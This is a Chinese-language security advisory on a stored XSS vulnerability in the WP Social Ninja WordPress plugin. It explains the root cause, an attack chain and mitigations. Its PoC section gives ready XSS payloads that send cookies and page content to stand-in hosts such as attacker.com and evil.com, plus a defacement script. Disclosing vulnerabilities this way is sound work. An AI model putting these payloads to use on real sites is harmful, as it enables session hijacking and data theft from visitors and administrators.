CVE-2025-13007: WordPress WP Social Ninja插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13007

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WP Social Ninja – Embed Social Feeds, Customer Reviews, Chat Widgets (WordPress插件)

漏洞概述

WP Social Ninja是一款流行的WordPress插件，用于嵌入社交动态、客户评论和聊天小部件。该插件在3.20.3及以下所有版本中存在严重的存储型跨站脚本漏洞。漏洞的根本原因在于插件对从外部来源（如Google Business Profile和Facebook页面）获取的内容缺乏充分的输入验证和输出转义处理。攻击者可以通过在Google Business Profile或Facebook页面发布包含恶意JavaScript代码的内容，当网站管理员或访问者访问包含这些恶意内容的页面时，注入的脚本将在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取、恶意重定向等严重后果。由于该插件被广泛应用于企业网站，任何使用该插件且启用了Google Business或Facebook评论功能的网站都可能受到影响。

技术细节

漏洞主要存在于插件处理外部社交平台评论和内容的环节。从参考链接可以看出，问题代码位于app/Services/Helper.php第19行、app/Services/Platforms/Reviews/GoogleMyBusiness.php第308行以及app/Views/public/reviews-templates/elements/review-content.php第7行。插件在获取Google Business Profile或Facebook页面的用户评论内容时，直接将外部数据渲染到网页而未进行适当的HTML转义。具体来说，当用户提交包含<script>标签或事件处理器属性（如onerror、onload等）的评论内容时，插件将其存储并直接输出到前端页面。由于WordPress的默认过滤机制无法完全覆盖这种外部数据流场景，导致恶意脚本得以执行。攻击者只需在Google Business Profile或Facebook页面发布一条带有XSS payload的虚假评论，即可实现对所有访问该页面用户的攻击。此漏洞为存储型XSS，相比反射型XSS危害更大，因为恶意代码会被永久保存在服务器上。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站是否使用WP Social Ninja插件，并确认是否启用了Google Business Profile或Facebook评论功能

STEP 2

步骤2: 恶意内容注入

攻击者在目标网站连接的Google Business Profile或Facebook页面发布包含XSS payload的虚假评论或动态

STEP 3

步骤3: 数据同步与存储

WP Social Ninja插件通过API获取外部评论内容，由于缺乏输入验证，恶意脚本被存储到网站数据库中

STEP 4

步骤4: 受害者访问

网站管理员或普通访客访问嵌入了恶意评论的页面

STEP 5

步骤5: 脚本执行

浏览器解析页面时，存储的恶意JavaScript代码被执行，导致cookie窃取、会话劫持或恶意重定向

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Stored XSS Payload for CVE-2025-13007 -->
<!-- This payload should be posted as a Google Business Profile or Facebook review -->

<!-- Basic script injection -->
<script>alert(document.cookie)</script>

<!-- Event handler based XSS -->
<img src=x onerror=fetch('https://attacker.com/steal?cookie='+document.cookie)>

<!-- Steal form data -->
<svg/onload=fetch('https://evil.com/log?data='+btoa(document.body.innerHTML))>

<!-- Session hijacking payload -->
<script>
document.addEventListener('DOMContentLoaded', function() {
    var cookies = document.cookie;
    fetch('https://attacker-controlled-site.com/collect?cookies=' + encodeURIComponent(cookies));
});
</script>

<!-- Defacement payload -->
<script>
document.body.innerHTML = '<h1>Site Hacked</h1><p>This site has been compromised.</p>';
</script>

影响范围

WP Social Ninja <= 3.20.3 (所有版本)

防御指南

临时缓解措施

如果无法立即升级插件，可临时禁用Google Business Profile和Facebook评论功能，同时在Web应用防火墙(WAF)上添加针对XSS特征的规则过滤。网站管理员应审查近期来自社交平台的评论内容，删除可疑条目，并加强对网站用户的身份验证机制。建议使用WordPress安全插件进行实时监控，以便及时发现异常脚本执行行为。